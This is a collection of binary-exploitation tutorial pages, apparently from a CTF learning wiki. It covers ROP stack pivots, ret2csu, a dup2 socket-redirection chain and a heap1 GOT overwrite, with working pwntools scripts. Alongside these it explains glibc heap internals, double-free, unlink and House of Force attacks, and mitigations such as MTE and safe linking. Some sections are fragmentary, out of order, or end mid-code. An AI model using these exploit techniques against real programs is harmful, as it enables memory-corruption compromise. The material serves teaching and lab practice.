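A minimal sketch of the two-stage payload, assuming elf and the leaked buffer address from earlier are set up, and assuming pop rdi and pop rsi gadgets exist (all gadget addresses here are hypothetical):

```python
LEAVE_RET = 0x40117d          # hypothetical leave; ret
POP_RDI   = 0x4011e3          # hypothetical pop rdi; ret
POP_RSI   = 0x4011e1          # hypothetical pop rsi; ret

# Stage 1: the fake stack placed at the start of the buffer (whose address we leaked)
fake_stack = flat(
    0x0,                      # dummy value consumed by the pop rbp of the second leave
    POP_RDI, 0xdeadbeef,      # winner()'s first parameter
    POP_RSI, 0xdeadc0de,      # winner()'s second parameter
    elf.sym['winner']
)

# Stage 2: pad to the saved RBP, point RBP at the buffer, then return to leave; ret
payload  = fake_stack.ljust(0x60, b'A')   # buffer is 0x60 bytes
payload += p64(buffer)                    # saved RBP -> start of the buffer
payload += p64(LEAVE_RET)                 # saved RIP -> leave; ret, moving RBP into RSP
p.sendline(payload)
```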
Final Exploit
find / -name secret.txt 2>/dev/null
p = process()
p = remote(host, port)
[...]
0x00401208 4c89f2 mov rdx, r14
0x0040120b 4c89ee mov rsi, r13
0x0040120e 4489e7 mov edi, r12d
0x00401211 41ff14df call qword [r15 + rbx*8]
0x00401215 4883c301 add rbx, 1
0x00401219 4839dd cmp rbp, rbx
0x0040121c 75ea jne 0x401208
0x0040121e 4883c408 add rsp, 8
0x00401222 5b pop rbx
0x00401223 5d pop rbp
0x00401224 415c pop r12
0x00401226 415d pop r13
0x00401228 415e pop r14
0x0040122a 415f pop r15
0x0040122c c3 ret
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
POP_CHAIN = 0x00401224 # pop r12, r13, r14, r15, ret
REG_CALL = 0x00401208 # rdx, rsi, edi, call [r15 + rbx*8]
[0x00401199]> dm
0x0000000000400000 - 0x0000000000401000 - usr 4K s r--
0x0000000000401000 - 0x0000000000402000 * usr 4K s r-x
0x0000000000402000 - 0x0000000000403000 - usr 4K s r--
0x0000000000403000 - 0x0000000000404000 - usr 4K s r--
0x0000000000404000 - 0x0000000000405000 - usr 4K s rw-
rop.raw(POP_CHAIN)
rop.raw(0) # r12
rop.raw(0) # r13
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function!
rop.raw(REG_CALL) # all the movs, plus the call
p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win'])) # send to gets() so it's written
print(p.recvline()) # should receive "Awesome work!"
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
POP_CHAIN = 0x00401224 # pop r12, r13, r14, r15, ret
REG_CALL = 0x00401208 # rdx, rsi, edi, call [r15 + rbx*8]
RW_LOC = 0x00404028
rop.raw('A' * 40)
rop.gets(RW_LOC)
rop.raw(POP_CHAIN)
rop.raw(0) # r12
rop.raw(0) # r13
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function!
rop.raw(REG_CALL) # all the movs, plus the call
p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win'])) # send to gets() so it's written
print(p.recvline()) # should receive "Awesome work!"
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
rop = ROP(elf)
POP_CHAIN = 0x00401228 # pop r14, pop r15, ret
REG_CALL = 0x00401208 # rdx, rsi, edi, call [r15 + rbx*8]
RW_LOC = 0x00404028
rop.raw('A' * 40)
rop.gets(RW_LOC)
rop.raw(POP_CHAIN)
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function!
rop.raw(REG_CALL) # all the movs, plus the call
p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win']))
print(p.recvline())
// gcc source.c -o vuln -no-pie
#include <stdio.h>
void winner(int a, int b) {
if(a == 0xdeadbeef && b == 0xdeadc0de) {
puts("Great job!");
return;
}
puts("Whelp, almost...?");
}
void vuln() {
char buffer[0x60];
printf("Try pivoting to: %p\n", buffer);
fgets(buffer, 0x80, stdin);
}
int main() {
vuln();
return 0;
}
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')
pop <reg> <=== return pointer
<reg value>
xchg <reg>, rsp
So we have a shell, but no way to control it. Time to use dup2.
I've simplified this challenge a lot by including a call to dup2() within the vulnerable binary, but normally you would leak libc via the GOT and then use libc's dup2() rather than the PLT; this walkthrough is about the basics, so I kept it as simple as possible.
Duplicating File Descriptors
As we know, we need to call dup2(oldfd, newfd). oldfd will be 4 (our connection fd) and newfd will be 0 and then 1 (we need to call it twice to redirect both stdin and stdout). Knowing what you do about calling conventions, have a go at doing this and then calling win(). The answer is below.
Using dup2()
Since we need two parameters, we'll need to find a gadget for RDI and RSI. I'll use ROPgadget to find these.
Plonk these values into the script.
Now to get all the calls to dup2().
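A sketch of the chain (the gadget addresses and the 72 bytes of padding are hypothetical - plug in your own):

```python
POP_RDI = 0x4012a3            # hypothetical pop rdi; ret
POP_RSI = 0x4012a1            # hypothetical pop rsi; ret

payload = flat(
    b'A' * 72,                                  # hypothetical padding to the return pointer
    POP_RDI, 4, POP_RSI, 0, elf.plt['dup2'],    # dup2(4, 0) - redirect stdin
    POP_RDI, 4, POP_RSI, 1, elf.plt['dup2'],    # dup2(4, 1) - redirect stdout
    elf.sym['win']                              # now win()'s output comes back down our socket
)
p.sendline(payload)
p.interactive()
```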
And wehey - the file descriptors were successfully duplicated!
Final Exploit
Pwntools' ROP
These kinds of chains are where pwntools' ROP capabilities really come into their own:
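(A rough sketch, using the same hypothetical padding as before.)

```python
rop = ROP(elf)
rop.raw(b'A' * 72)            # hypothetical padding to the return pointer
rop.dup2(4, 0)                # pwntools finds the gadgets and the PLT entry for us
rop.dup2(4, 1)
rop.win()

p.sendline(rop.chain())
p.interactive()
```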
Works perfectly and is much shorter and more readable!
Much like with Pointer Authentication, Arm consistently comes out with hardware-enabled protections that provide greater security. The Memory Tagging Extension (MTE), as it is called, is a hardware-based defence against memory safety vulnerabilities.
There are two common mistakes in memory management that cause the bulk of these vulnerabilities:
Spatial safety violations - for example buffer overflows and other out-of-bounds accesses - where a pointer is used outside the bounds of its allocation
Temporal safety violations - for example use-after-free - where a pointer is used after its allocation has been freed
MTE aims to mitigate both of these vulnerabilities using a "lock" and "key" system.
Operation: Tagging
Within the lock and key system, there are two types of tagging:
Address Tagging (the key) - adds a four-bit "tag" to the top of every pointer used in the program; this only works in 64-bit applications since it uses "top-byte-ignore", an Arm 64-bit feature
Memory Tagging (the lock) - also consists of four bits, linked to every 16-byte aligned region in the application's memory space (these regions are referred to as tag granules)
The idea is that, through address tagging, a pointer can only access a region of memory if the memory tag matches the address tag. Let's take an example:
The pointer p is "tagged" with the green tag, but is attempting to access memory that is tagged purple. The processor notes that the tag of the pointer is different to that of the purple tag, and throws an error.
On initial allocation via malloc, 2N bytes of space is tagged green, and the pointer is tagged green. Then, when the green pointer is freed, the green memory is retagged to red. If the green pointer is then used again, the processor will notice a difference in tag and throw an error.
How is MTE used?
There are three modes of operation: Synchronous (SYNC), Asynchronous (ASYNC) and Asymmetric (ASYMM).
Synchronous mode is optimized for correctness of bug detection and has the highest overhead; on a tag mismatch, the process terminates with SIGSEGV immediately
Asynchronous is optimized for performance; on a tag mismatch, the process continues execution until the nearest kernel entry, and then terminates with SIGSEGV
Asymmetric is an improvement on Asynchronous in pretty much every way, doing synchronous checking on reads and asynchronous on writes
Android suggests using SYNC mode for testing to catch bugs, and ASYMM in production (or ASYNC if ASYMM does not exist in the processor) due to the lower overhead.
While MTE is incredibly powerful, it is sometimes too powerful, and as a result it is not always enabled by default. Many apps contain buggy, invalid accesses that currently work silently, but would cause a full crash if MTE were enabled. As a result, MTE is not forced upon user-installed apps on either Android or iOS. Due to performance concerns, MTE is not enabled by default for the Android kernel either.
Enhanced MTE
This is a set of modifications made to MTE by Apple, through collaboration with Arm. I can find little information about it except under the heading FEAT_MTE4, Enhanced Memory Tagging Extension. It is very much linked to Apple's new security mitigation, Memory Integrity Enforcement, which is found in their very latest iPhones. We can expect to see this in the new Apple Silicon chips.
Unlike the stack, heap is an area of memory that can be dynamically allocated. This means that when you need new space, you can "request" more from the heap.
In C, this often means using functions such as malloc() to request the space. However, heap management is comparatively slow and the heap can take up a lot of space. This means the developer has to tell libc when the heap data is finished with, and they do this via calls to free(), which mark the area as available. But where there are humans there will be implementation flaws, and no amount of protection will ever ensure code is completely safe.
In the following sections, we will only discuss 64-bit systems (with the exception of some parts that were written long ago). The theory is the same, but pretty much any heap challenge (or real-world application) will be on 64-bit systems.
Memory Integrity Enforcement
Malloc State
pop rsp
Using a pop rsp gadget to stack pivot
Exploitation
Gadgets
First off, let's grab all the gadgets. I'll use ROPgadget again to do so:
Now we have all the gadgets, let's chuck them into the script:
Testing the pop
Let's just make sure the pop works by sending a basic chain and then breaking on ret and stepping through.
If you're careful, you may notice the mistake here, but I'll point it out in a sec. Send it off, attach r2.
You may see that only the gadget + 2 more values were written; this is because our buffer length is limited, and this is the reason we need to stack pivot. Let's step through the first pop.
You may notice it's the same as our "leaked" value, so it's working. Now let's try and pop the 0x0 into r13.
What? We passed in 0x0 to the gadget!
Remember, however, that pop r13 is equivalent to mov r13, [rsp] - the value from the top of the stack is moved into r13. Because we moved RSP, the top of the stack moved to our buffer and AAAAAAAA was popped into it - because that's what the top of the stack points to now.
Full Payload
Now we understand the intricacies of the pop, let's just finish the exploit off. To account for the additional pop calls, we have to put some junk at the beginning of the buffer, before we put in the ropchain.
Final Exploit
Chunks
Internally, every chunk - whether allocated or free - is stored in a malloc_chunk structure. The difference is how the memory space is used.
Allocated Chunks
When space is allocated from the heap using a function such as malloc(), a pointer to a heap address is returned. Every chunk has additional metadata that it has to store in both its used and free states.
The chunk has two sections - the metadata of the chunk (information about the chunk) and the user data, where the data is actually stored.
The size field is the overall size of the chunk, including metadata. It must be a multiple of 8, meaning the last 3 bits of the size are 0. This allows the flags A, M and P to take up that space, with A being the 3rd-last bit of size, M the 2nd-last and P the last.
The flags have special uses:
P is the PREV_INUSE flag, which is set when the previous adjacent chunk (the chunk directly before this one in memory) is in use
M is the IS_MMAPPED flag, which is set when the chunk is allocated via mmap() rather than a heap mechanism such as malloc()
A is the NON_MAIN_ARENA flag, which is set when the chunk is not located in main_arena; we will get to Arenas in a later section, but in essence every created thread is provided a different arena (up to a limit) and chunks in these arenas have the A bit set
prev_size is only set if the previous adjacent chunk is free, as indicated by P being 0. If it is not, the heap saves space and prev_size is part of the previous chunk's user data. If it is, then prev_size stores the size of the previous chunk.
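In glibc these flags are simple bit masks on the size field; a rough sketch of how they are defined and stripped (names and values as in malloc.c):
/* the low three bits of the size field double as flags */
#define PREV_INUSE     0x1
#define IS_MMAPPED     0x2
#define NON_MAIN_ARENA 0x4

size_t real_size = chunk->mchunk_size & ~0x7;   /* mask the flags off to get the true size */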
Free Chunks
Free chunks have additional metadata to handle the linking between them.
This can be seen in the struct:
malloc_consolidate()
Consolidating fastbins
Earlier, I said that chunks that went to the unsorted bin would consolidate, but fastbins would not. This is technically not true, but they don't consolidate automatically; in order for them to consolidate, the function malloc_consolidate() has to be called. This function looks complicated, but it essentially just grabs all adjacent fastbin chunks and combines them into larger chunks, placing them in the unsorted bin.
Why do we care? Well, UAFs and the like are very nice to have, but a Read-After-Free on a fastbin chunk can only ever leak you a heap address, as the singly-linked lists only use the fd pointer which points to another chunk (on the heap) or is NULL. We want to get a libc leak as well!
If we free enough adjacent fastbin chunks at once and trigger a call to malloc_consolidate(), they will consolidate to create a chunk that goes to the unsorted bin. The unsorted bin is doubly-linked, and acts accordingly - if it is the only element in the list, both fd and bk will point to a location in malloc_state, which is contained within libc.
This means that the more important thing for us to know is how we can trigger this consolidation.
Some of the most important ways include:
Inputting a very long number into scanf (around 0x400 characters long)
This works because the code responsible for it manages a scratch_buffer and assigns it 0x400 bytes, but uses malloc when the data is too big (along with realloc if it gets even bigger than the heap chunk, and free at the end, so it works to trigger those functions too - great for triggering hooks!)
Inputting something along the lines of %10000c into a format string vulnerability also triggers a chunk to be created
Both of these work because a largebin allocation triggers malloc_consolidate. By checking the calls to the function in malloc.c (2.35), we can find other triggers.
It's possible for earlier or later glibc versions to have a greater or lesser number of calls to a specific function, so make sure to check for your version! You may find another way exists.
The most common and most important trigger: a call to malloc() requesting a chunk of largebin size will consolidate the fastbins before servicing the request.
There is another call to it in the use_top section of _int_malloc. This section is reached when the top chunk has to be used to service the request. The code checks if the top chunk is large enough to service the request:
If not, it checks if there are fastchunks in the arena. If there are, it calls malloc_consolidate to attempt to regain space to service the request!
So, by filling the heap and requesting another chunk, we can trigger a call to malloc_consolidate().
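As a rough illustration of that idea (the sizes are purely illustrative - the point is that the final request is of largebin size while the fastbins are non-empty):
#include <stdlib.h>

int main() {
    void *chunks[10];
    for (int i = 0; i < 10; i++) chunks[i] = malloc(0x40);
    for (int i = 0; i < 10; i++) free(chunks[i]);   /* 7 fill the tcache, the rest hit the fastbin */

    malloc(0x500);   /* largebin-sized request -> malloc_consolidate() runs on the fastbins */
    return 0;
}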
(If both conditions fail, _int_malloc falls back to essentially using mmap to service the request.)
Heap Overflow
Heap Overflow, much like a Stack Overflow, involves too much data being written to the heap. This can result in us overwriting data, most importantly pointers. Overwriting these pointers can cause user input to be copied to different locations if the program blindly trusts data on the heap.
To introduce this (it's easier to understand with an example) I will use two vulnerable binaries from Phoenix, formerly Protostar.
TODO
Calling mtrim will consolidate fastbins (which makes sense, given the name malloc_trim). Unlikely to ever be useful, but please do let me know if you find a use for it!
When changing malloc options using mallopt, the fastbins are first consolidated. This is pretty useless, as mallopt is likely called once (if at all) in the program prelude before it does anything.
/* If this is a large request, consolidate fastbins before continuing [...] */
else
  {
    idx = largebin_index (nb);
    if (atomic_load_relaxed (&av->have_fastchunks))
      malloc_consolidate (av);
  }
else if (atomic_load_relaxed (&av->have_fastchunks))
{
malloc_consolidate (av);
/* restore original bin index */
if (in_smallbin_range (nb))
idx = smallbin_index (nb);
else
idx = largebin_index (nb);
}
Fastbins are a singly-linked list of chunks. The point of these is that very small chunks are reused quickly and efficiently. To aid this, chunks of fastbin size do not consolidate (they are not absorbed into surrounding free chunks once freed).
A fastbin is a LIFO (Last-In-First-Out) structure, which means the last chunk to be added to the bin is the first chunk to come out of it. Glibc only keeps track of the HEAD, which points to the first chunk in the list (and is set to 0 if the fastbin is empty). Every chunk in the fastbin has an fd pointer, which points to the next chunk in the bin (or is 0 if it is the last chunk).
When a new chunk is freed, it's added at the front of the list (making it the head):
The fd of the newly-freed chunk is overwritten to point at the old head of the list
HEAD is updated to point to this new chunk, setting the new chunk as the head of the list
Let's have a visual demonstration (it will help)! Try out the following C program:
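The program itself isn't reproduced here, but a minimal version along these lines shows the behaviour described below (chunk sizes and variable names assumed):
#include <stdio.h>
#include <stdlib.h>

int main() {
    char *a = malloc(0x20), *b = malloc(0x20), *c = malloc(0x20);
    printf("a: %p\nb: %p\nc: %p\n", a, b, c);

    free(a); free(b); free(c);

    char *d = malloc(0x20), *e = malloc(0x20), *f = malloc(0x20);
    printf("d: %p\ne: %p\nf: %p\n", d, e, f);
    return 0;
}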
We get:
As you can see, the chunk a gets reassigned to chunk f, b to e and c to d. So, if we free() a chunk, there's a good chance our next malloc() - if it's of the same size - will use the same chunk.
It can be really confusing as to why we add and remove chunks from the start of the list (why not the end?), but it's really just the most efficient way to add an element. Let's say we have this fastbin setup:
In this case HEAD points to a, and a points onwards to b as the next chunk in the bin (because the fd field of a points to b). Now let's say we free another chunk c. If we want to add it to the end of the list like so:
We would have to update the fd pointer of b to point at c. But remember that glibc only keeps track of the first chunk in the list - it only has the HEAD stored. It has no information about the end of this list, which could be many chunks long. This means that to add c in at the end, it would first have to start at the head and traverse through the entire list until it got to the last chunk, then overwrite the fd field of the last chunk to point at c and make c the last chunk.
Meanwhile, if it adds at the HEAD:
All we need to do is:
Set the fd of c to point at a
This is easy, as a was the old head, so glibc had a pointer to it stored already
HEAD is then updated to point to c, making it the head of the list
This is also easy, as the pointer to c is freely available
This has much less overhead!
For reallocating the chunk, the same principle applies - it's much easier to update HEAD to point to a by reading the fd of c than it is to traverse the entire list until it gets to the end.
Operations of the Other Bins
When a non-fast chunk is freed, it gets put into the Unsorted Bin. When new chunks are requested, glibc looks at all of the bins:
If the requested chunk is large (of largebin size), the fastbins are first consolidated into larger free chunks. We will get into the mechanisms of this at a later point, but essentially I lied earlier - fastbins do consolidate, but not on freeing!
Finally, we iterate through the chunks in the unsorted bin
If it is empty, we service the request using the top chunk instead, pushing the now-smaller top chunk to start at a higher memory address
If the requested size is equal to the size of the chunk in the bin, return the chunk
If it's smaller, split the chunk in the bin in two and return a portion of the correct size
If it's larger, the chunks in the unsorted bin get sorted into their respective small and large bins, and after this there may be free chunks big enough to service the request
If not, we again service the request using the top chunk, pushing the now-smaller top chunk to start at a higher memory address
One thing that is very easy to forget is what happens on allocation and what happens on freeing, as it can be a bit counter-intuitive. For example, the fastbin consolidation is triggered from an allocation!
The Top Chunk and Remainder
Creating more heap space
Also known as the wilderness, the top chunk is the final chunk in the heap. The size of the top chunk is equal to the size of the free heap space.
[TODO image here]
If a new chunk is allocated and there are no free chunks suitable, the top chunk shrinks and is pushed back to make space for the new heap. The use of the top is triggered here, and the actual logic can be found here:
If the size of the requested chunk is less than or equal to the size of the top chunk, it is broken into two chunks - the return chunk (located where the top chunk was previously) and the remainder chunk, which is the new top chunk with a reduced size.
If the size is greater than the top chunk can handle, glibc attempts to consolidate fastbins. If there are no fastbins (or there's still not enough space), we fall back to sysmalloc(), which grows the heap via brk or calls mmap (on systems that have it).
Double-Free
Overview
A double-free can take a bit of time to understand, but ultimately it is very simple.
Firstly, remember that for fast chunks in the fastbin, the location of the next chunk in the bin is specified by the fd pointer. This means if chunk a points to chunk b, once chunk a is freed the next chunk in the bin is chunk b.
In a double-free, we attempt to control fd. By overwriting it with an arbitrary memory address, we can tell malloc() where the next chunk is to be allocated. For example, say we overwrote a->fd to point at 0x12345678; once a is free, the next chunk on the list will be 0x12345678.
Controlling fd
As it sounds, we have to free the chunk twice. But how does that help?
Let's watch the progress of the fastbin if we free an arbitrary chunk a twice:
Fairly logical.
But what happens if we called malloc() again for the same size?
Well, strange things would happen. a is both allocated (in the form of b) and free at the same time.
If you remember, the heap attempts to save as much space as possible and when the chunk is free the fd pointer is written where the user data used to be.
But what does this mean?
When we write into the user data of b, we're writing into the fd of a at the same time.
And remember - controlling fd means we can control where the next chunk gets allocated!
So we can write an address into the data of b, and that's where the next chunk gets placed.
Now, the next alloc will return a again. This doesn't matter, we want the one afterwards.
Boom - an arbitrary write.
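Condensed into code, and glossing over the size-metadata requirements covered later, the whole dance looks something like this (the target address is purely illustrative):
char *a = malloc(0x40);
char *b = malloc(0x40);

free(a);
free(b);          /* free something else in between to dodge the fasttop check */
free(a);          /* double-free: a is now in the fastbin twice */

char *c = malloc(0x40);          /* returns a, which is still "free" in the bin */
*(size_t *)c = 0xdeadbeef;       /* writes a->fd, i.e. the "next chunk" pointer */

malloc(0x40);                    /* returns b */
malloc(0x40);                    /* returns a again */
char *target = malloc(0x40);     /* returns 0xdeadbeef (if its fake size passes the checks) */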
Freeing Chunks and the Bins
An Overview of Freeing
When we are done with a chunk's data, the data is freed using a function such as free(). This tells glibc that we are done with this portion of memory.
In the interest of being as efficient as possible, glibc makes a lot of effort to recycle previously-used chunks for future requests in the program. As an example, let's say we need 100 bytes to store a string input by the user. Once we are finished with it, we tell glibc we are no longer going to use it. Later in the program, we have to input another 100-byte string from the user. Why not reuse that same part of memory? There's no reason not to, right?
It is the bins that are responsible for the bulk of this memory recycling. A bin is a (doubly- or singly-linked) list of free chunks. For efficiency, different bins are used for different sizes, and the operations will vary depending on the bins as well to keep high performance.
When a chunk is freed, it is "moved" to the bin. This movement is not physical, but rather a pointer - a reference to the chunk - is stored somewhere in the list.
Bin Operations
There are four bins: fastbins, the unsorted bin, smallbins and largebins.
When a chunk is freed, the function that does the bulk of the work in glibc is _int_free(). I won't delve into the source code right now, but will provide hyperlinks to glibc 2.3, a very old version without security checks. You should have a go at familiarising yourself with what the code says, but bear in mind things have been moved about a bit to get to where they are in the present day! You can change the version on the left in bootlin to see how it's changed.
First, the size of the chunk is checked. If it is less than the largest fastbin size, the chunk is placed into the corresponding fastbin
Otherwise, if it's mmapped, the chunk gets munmapped
Finally, the chunk is consolidated with any adjacent free chunks and placed into the unsorted bin
What is consolidation? We'll be looking into this more concretely later, but it's essentially the process of finding other free chunks around the chunk being freed and combining them into one large chunk. This makes the reuse process more efficient.
Fastbins
Fastbins store small-sized chunks. There are 10 of these for chunks of size 16, 24, 32, 40, 48, 56, 64, 72, 80 or 88 bytes including metadata.
Unsorted Bin
There is only one of these. When small and large chunks are freed, they end up in this bin to speed up allocation and deallocation requests.
Essentially, this bin gives the chunks one last shot at being used. Future malloc requests, if smaller than a chunk currently in the bin, split up that chunk into two pieces and return one of them, speeding up the process - the leftover piece becomes what glibc calls the last remainder chunk. If the chunk requested is larger, then the chunks in this bin get moved to the respective Small/Large bins.
Small Bins
There are 62 small bins of sizes 16, 24, ... , 504 bytes and, like fast bins, chunks of the same size are stored in the same bins. Small bins are doubly-linked and allocation and deallocation is FIFO.
The purpose of the FD and BK pointers, as we saw before, is to point to the chunks ahead and behind in the bin.
Before ending up in the unsorted bin, contiguous small chunks (small chunks next to each other in memory) can coalesce (consolidate), meaning their sizes combine and become a bigger chunk.
Large Bins
There are 63 large bins, and unlike small bins each one can store chunks of a range of different sizes. The free chunks are ordered in decreasing order of size, meaning insertions and deletions can occur at any point in the list.
The first 32 bins have a range of 64 bytes:
Like small chunks, large chunks can coalesce together before ending up in the unsorted bin.
Head and Tail
Each bin is represented by two values, the HEAD and TAIL. As it sounds, HEAD is at the top and TAIL at the bottom. Most insertions happen at the HEAD, so in LIFO structures (such as the fastbins) reallocation occurs there too, whereas in FIFO structures (such as small bins) reallocation occurs at the TAIL. For fastbins, the TAIL is null.
The Tcache
New and efficient heap management
Starting in glibc 2.26, a new heap feature called the tcache was released. The tcache was designed to be a performance booster, and the operation is very simple: every chunk size (up to size 0x410) has its own tcache bin, which can store up to 7 chunks. When a chunk of a specific size is allocated, the tcache bin is searched first. When it is freed, the chunk is added to the tcache bin; if it is full, it then goes to the standard fastbin/unsorted bin.
The tcache bin acts like a fastbin - it is a singly-linked list of free chunks of a specific size. The handling of the list, using fd pointers, is identical. As you can expect, the attacks on the tcache are also similar to the attacks on fastbins.
Ironically, years of defenses that were implemented into the fastbins - such as the double-free checks - were ignored in the initial implementation of the tcache. This means that using the heap to attack a binary running under glibc 2.27 is easier than one running under 2.25!
Unlink Exploit
Overview
When a chunk is removed from a bin, unlink() is called on the chunk. The unlink macro looks like this:
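In old (pre-hardening) glibc it looked roughly like this:
#define unlink(P, BK, FD) {     \
    FD = P->fd;                 \
    BK = P->bk;                 \
    FD->bk = BK;                \
    BK->fd = FD;                \
}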
Note how fd and bk are written to locations that depend on fd and bk themselves; if we can fake those pointers, we get a write to a location of our choosing.
struct malloc_chunk {
INTERNAL_SIZE_T mchunk_prev_size; /* Size of previous chunk (if free). */
INTERNAL_SIZE_T mchunk_size; /* Size in bytes, including overhead. */
struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;
/* Only used for large blocks: pointer to next larger size. */
struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
struct malloc_chunk* bk_nextsize;
};
Tcache poisoning is a fancy name for a double-free in the tcache chunks.
Use-After-Free
Much like the name suggests, this technique involves us using data once it is freed. The weakness here is that programmers often wrongly assume that once the chunk is freed it cannot be used and don't bother writing checks to ensure data is not freed. This means it is possible to write data to a free chunk, which is very dangerous.
TODO: binary
Tcache: calloc()
We want to write the value 0x1000000c to 0x5655578c. If we had the ability to create a fake free chunk, we could choose the values for fd and bk. In this example, we would set fd to 0x56555780 (bear in mind the first 0x8 bytes in 32-bit would be for the metadata, so P->fd is actually 8 bytes off P and P->bk is 12 bytes off) and bk to 0x10000000. Then when we unlink() this fake chunk, the process is as follows:
This may seem like a lot to take in. It's a lot of seemingly random numbers. What you need to understand is P->fd just means 8 bytes off P and P->bk just means 12 bytes off P.
If you imagine the chunk looking like
Then the fd and bk pointers point at the start of the chunk - prev_size. So when overwriting the fd pointer here:
FD points to 0x56555780, and then 0xc gets added on for bk, making the write actually occur at 0x5655578c, which is what we wanted. That is why we fake fd and bk values lower than the actual intended write location.
In 64-bit, all the chunk data takes up 0x8 bytes each, so the offsets for fd and bk will be 0x10 and 0x18 respectively.
The slight issue with the unlink exploit is not only does fd get written to where you want, bk gets written as well - and if the location you are writing either of these to is protected memory, the binary will crash.
Protections
More modern libc versions have a different version of the unlink macro, which looks like this:
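Roughly, from unlink_chunk() in modern glibc:
mchunkptr fd = p->fd;
mchunkptr bk = p->bk;

if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
  malloc_printerr ("corrupted double-linked list");

fd->bk = bk;
bk->fd = fd;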
Here unlink() checks the bk pointer of the forward chunk and the fd pointer of the backward chunk and makes sure they point to P, which is unlikely if you fake a chunk. This quite significantly restricts where we can write using unlink.
heap1
http://exploit.education/phoenix/heap-one/
Source
Analysis
This program:
Allocates a chunk on the heap for the heapStructure
Allocates another chunk on the heap for the name of that heapStructure
Repeats the process with another heapStructure
Copies the two command-line arguments to the name variables of the heapStructures
Prints something
Regular Execution
Let's break on and after the first strcpy.
As we expected, we have two pairs of heapStructure and name chunks. We know the strcpy will be copying into wherever name points, so let's read the contents of the first heapStructure. Maybe this will give us a clue.
Look! The name pointer points to the name chunk! You can see the value 0x602030 being stored.
This isn't particularly a revelation in itself - after all, we knew there was a pointer in the chunk. But now we're certain, and we can definitely overwrite this pointer due to the lack of bounds checking. And because we can also control the value being written, this essentially gives us an arbitrary write!
And where better to target than the GOT?
Exploitation
The plan, therefore, becomes:
Pad until the location of the pointer
Overwrite the pointer with the GOT address of a function
Set the second parameter to the address of winner
Next time the function is called, it will call winner instead
But what function should we overwrite? The only function called after the strcpy is printf, according to the source code. And if we overwrite printf with winner it'll just recursively call itself forever.
Luckily, compilers like gcc compile printf as puts if there are no format string parameters - we can see this with radare2:
So we can simply overwrite the GOT address of puts with winner. All we need to find now is the padding until the pointer and then we're good to go.
Break on and after the strcpy again and analyse the second chunk's name pointer.
The pointer is originally at 0x8d9050; once the strcpy occurs, the value there is 0x41415041414f4141.
The offset is 40.
Final Exploit
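A sketch of the exploit, using the 40-byte offset found above; the symbol names are taken from the analysis, and the trailing null bytes are stripped for the reason mentioned below:
from pwn import *

elf = context.binary = ELF('./heap1')

arg1 = b'A' * 40 + p64(elf.got['puts']).rstrip(b'\x00')   # overwrite the second name pointer with puts@GOT
arg2 = p64(elf.sym['winner']).rstrip(b'\x00')             # the second strcpy writes winner over puts@GOT

p = process([elf.path, arg1, arg2])
print(p.clean().decode())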
Again, null bytes aren't allowed in parameters so you have to remove them.
Double-Free Protections
It wouldn't be fun if there were no protections, right?
Using Xenial Xerus, try running:
#include <stdio.h>
#include <stdlib.h>
int main() {
int *a = malloc(0x50);
free(a);
free(a);
return 1;
}
Notice that it throws an error.
Double Free or Corruption (Fasttop)
Is the chunk at the top of the bin the same as the chunk being inserted?
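The check in _int_free() is roughly this:
/* p is the chunk being freed, old is the current head of the fastbin */
if (__builtin_expect (old == p, 0))
  malloc_printerr ("double free or corruption (fasttop)");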
For example, the following code still works:
malloc(): memory corruption (fast)
When removing the chunk from a fastbin, make sure the size falls into the fastbin's range
The previous protection could be bypassed by freeing another chunk in between the double-free and just doing a bit more work that way, but then you fall into this trap.
Namely, if you overwrite fd with something like 0x08041234, you have to make sure the metadata fits - i.e. the size ahead of the data is completely correct - and that makes it harder, because you can't just write into the GOT, unless you get lucky.
The House of Force
Exploiting the wilderness
Glibc Version: < 2.29 (the technique was patched from 2.29 onwards)
Primitive Required: Heap overflow into the top chunk, plus a chunk allocation of arbitrary size
Primitive Gained: Arbitrary Write
In the House of Force, we overflow the size field of the top chunk with a huge value. We then request a chunk with a huge size. Due to the size overwrite, we bypass the top chunk size check:
Because the check is passed, we trick glibc into servicing the large request from the heap rather than using mmap(). This gives us a lot of control over the remainder chunk:
Note that if we can control the allocation size (the nb variable here), we pass that size to chunk_at_offset():
This macro takes the address and adds nb onto it - but because we have control over nb, we can control where the remainder chunk is placed, and therefore where the next top chunk is located. This means that the next allocation can be located at an address of our choice!
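For reference, the relevant top-chunk logic in _int_malloc() (pre-2.29) looks roughly like this:
victim = av->top;
size = chunksize (victim);

if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
  {
    remainder_size = size - nb;
    remainder = chunk_at_offset (victim, nb);   /* victim + nb - and nb is attacker-controlled */
    av->top = remainder;                        /* the new top chunk lands wherever we say */
    set_head (victim, nb | PREV_INUSE |
              (av != &main_arena ? NON_MAIN_ARENA : 0));
    set_head (remainder, remainder_size | PREV_INUSE);
    return chunk2mem (victim);
  }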
Note that we can even write to addresses ahead of the heap in memory by triggering an integer overflow!
TODO mathematics
TODO source
TODO patch
The Patch
In glibc 2.29, there is a new check to protect against the House of Force:
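The relevant lines from _int_malloc() in malloc.c:
victim = av->top;
size = chunksize (victim);

if (__glibc_unlikely (size > av->system_mem))
  malloc_printerr ("malloc(): corrupted top size");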
Very simple - check if the size is ridiculously large, and throw an error if so.
Safe Linking
Starting from glibc 2.32, a new Safe-Linking mechanism was implemented to protect the singly-linked lists (the fastbins and tcachebins). The theory is to protect the fd pointer of free chunks in these bins with a mangling operation, making it more difficult to overwrite it with an arbitrary value.
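The macro in question, from malloc.c (glibc 2.32 onwards):
#define PROTECT_PTR(pos, ptr) \
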